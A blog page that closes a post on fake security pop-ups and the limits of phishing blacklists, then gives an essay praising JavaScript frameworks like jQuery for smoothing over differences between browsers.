I know I can’t. As much as I admire distributed phishing blacklist efforts, there’s no way they can possibly keep pace with the rapid setup and teardown of hacked websites. How many compromised websites are out there? How many unsophisticated users surf the internet every day?
As always, we can lay a big part of the blame at Microsoft’s doorstep for not adopting the UNIX policy of non-administrator accounts for regular users. But then again, if the spoofing is good enough, the FUI extra-convincing, even a Linux or OS X user could be coerced into entering their admin password for a “system security scan”. Or maybe they just wanted to see the dancing bunnies.
And then, like Ryan, you’re likely to end up with the same infected computer, and the same distraught spouse. All this for the love of a few lilies.
Short of user education, which is a neverending, continuous uphill battle — how would you combat a perfectly spoofed FUI presented to a naive user?
Secrets of the JavaScript Ninjas
One of the early technology decisions we made on Stack Overflow was to go with a fairly JavaScript intensive site. Like many programmers, I’ve been historically ambivalent about JavaScript:
- The Power of “View Source”
- The Day Performance Didn’t Matter Any More
- JavaScript and HTML: Forgiveness by Default
- JavaScript: The Lingua Franca of the Web
- The Great Browser JavaScript Showdown
However, it’s difficult to argue with the demonstrated success of JavaScript over the last few years. JavaScript code has gone from being a peculiar website oddity to — dare I say it — delivering useful core features on websites I visit on a daily basis. Paul Graham had this to say on the definition of Web 2.0 in 2005:
One ingredient of its meaning is certainly Ajax, which I can still only just bear to use without scare quotes. Basically, what “Ajax” means is “Javascript now works.” And that in turn means that web-based applications can now be made to work much more like desktop ones.
Three years on, I can’t argue the point: JavaScript now works. Just look around you on the web.
Well, to a point. We can no longer luxuriate in the — and to be clear, I mean this ironically — golden age of Internet Explorer 6. We live in a brave new era of increasing browser competition, and that’s a good thing. Yes, JavaScript is now mature enough and ubiquitous enough and fast enough to be a viable client programming runtime. But this vibrant browser competition also means there are hundreds of aggravating differences in JavaScript implementations between Opera, Safari, Internet Explorer, and Firefox. And that’s just the big four. It is excruciatingly painful to write and test your complex JavaScript code across (n) browsers and (n) operating systems. It’ll make you pine for the good old days of HTML 4.0 and CGI.
But now something else is happening, something arguably even more significant than “JavaScript now works”. The rise of commonly available JavaScript frameworks means you can write to higher level JavaScript APIs that are guaranteed to work across multiple browsers. These frameworks spackle over the JavaScript implementation differences between browsers, and they’ve (mostly) done all the ugly grunt work of testing their APIs and validating them against a host of popular browsers and platforms.
The JavaScript Ninjas have delivered their secret and ultimate weapon: common APIs. They transform working with JavaScript from an unpleasant, write-once-debug-everywhere chore into something that’s actually — dare I say it — fun.
Frankly, it is foolish to even consider rolling your own JavaScript code to do even the most trivial of things in a browser now. Instead, choose one of these mature, widely tested JavaScript API frameworks. Spend a little time learning it. You’ll ultimately write less code that does more — and (almost) never have to worry a lick about browser compatibility. It’s basically browser coding nirvana, as Rick Strahl noted:
I’ve kind of fallen into a couple of very client heavy projects and jQuery is turning out to be a key part in these particular projects. jQuery is definitely one of those tools that has got me really excited as it has changed my perspective in Web Development considerably from dreading doing client development to actually looking forward to applying richer and more interactive client principles.
There are several popular JavaScript API frameworks to choose from:
I don’t profess to be an expert in any of these. Far from it. But I will echo what Rick said: using jQuery while writing Stack Overflow is probably the only time in my entire career as a programmer that I have enjoyed writing JavaScript code.
It’s sure pleasant to write code against solid, increasingly standardized JavaScript API libraries that spackle over all those infuriating browser differences. I, for one, would like to thank John Resig and all the other JavaScript Ninjas who share their secrets — and their frameworks — with the rest of the community.